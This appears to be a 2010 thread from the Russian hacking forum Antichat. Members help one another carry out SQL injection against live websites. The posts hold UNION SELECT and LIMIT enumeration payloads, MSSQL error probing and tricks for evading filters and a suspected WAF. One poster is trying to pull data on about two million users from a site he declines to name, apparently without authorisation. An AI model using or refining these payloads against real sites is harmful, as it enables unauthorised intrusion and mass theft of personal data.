Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

18.04.2010, 01:12
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
vsid55, лимитом и перебирай
+limit+1,1--
+limit+2,1--
+limit+3,1--
+limit+4,1--
и так далее
|
|
|

18.04.2010, 02:59
|
|
Новичок
Регистрация: 30.04.2009
Сообщений: 9
Провел на форуме: 35489
Репутация:
0
|
|
MSSQL
script.php?id=14'%20and%201=1--
Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?
|
|
|

18.04.2010, 04:32
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Сообщение от slayzer
MSSQL
script.php?id=14'%20and%201=1--
Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?
OMG
дай линк в ПМ..
|
|
|

18.04.2010, 11:30
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме: 117639
Репутация:
55
|
|
стандартная скуль в mysql
http://www.xxx.com/index.php?id=2956775+union+select+1,2,3,4,5,6,7,8, 9,10/*
выдает нормальную страницу юзера
а вот попытки вывести принтабельные поля не проходят.
все фишки типа:
http://www.xxx.com/index.php?id=-2956775+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.xxx.com/index.php?id=29567111175+union+select+1,2,3,4,5,6, 7,8,9,10/*
http://www.xxx.com/index.php?id=2956775+and+1=2+union+select+1,2,3,4, 5,6,7,8,9,10/*
не дают результат, выводит только:
The profile is not active!
есть ли еще идеи как это обойти?
админки нет, а blind'oм тянуть 2 ляма юзеров это самоубийство
Последний раз редактировалось durito; 18.04.2010 в 11:36..
|
|
|

18.04.2010, 13:11
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
durito
А http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10/* выдает профиль?
Может union и(или) select фильтруются? Поиграй регистром и скобками.
|
|
|

18.04.2010, 13:16
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме: 117639
Репутация:
55
|
|
budden
http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/*
выдает профиль юзера
такой же как и тут
http://www.xxx.com/index.php?id=2956775
сайт серьезный, поэтому урл не публикую
|
|
|

18.04.2010, 13:18
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
unhex(hex())
|
|
|

18.04.2010, 13:18
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
and+1=0+ попробуй
-2956775 тоже
|
|
|

18.04.2010, 13:40
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме: 947074
Репутация:
257
|
|
Сообщение от durito
budden
http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/*
выдает профиль юзера
такой же как и тут
http://www.xxx.com/index.php?id=2956775
сайт серьезный, поэтому урл не публикую
Что значит выдает профиль юзера?
Если значение intval, то и так будет выдавать id=2956775+antichat+ru--+, и не факт что это инжа. И что значит "and 1=1"? Параметр id и так верный, какой смысл в данной манипуляции?
И последнее.. Только я не вижу вопроса?
|
|
|

18.04.2010, 14:36
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
v1d0qz
Я тоже так подумал, потому и спросил:
http://www.xxx.com/index.php?id=2956775+and+1=1... у него дает профиль, а
http://www.xxx.com/index.php?id=2956775+and+1=2... - не дает.
Мне кажется там WAF стоит.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|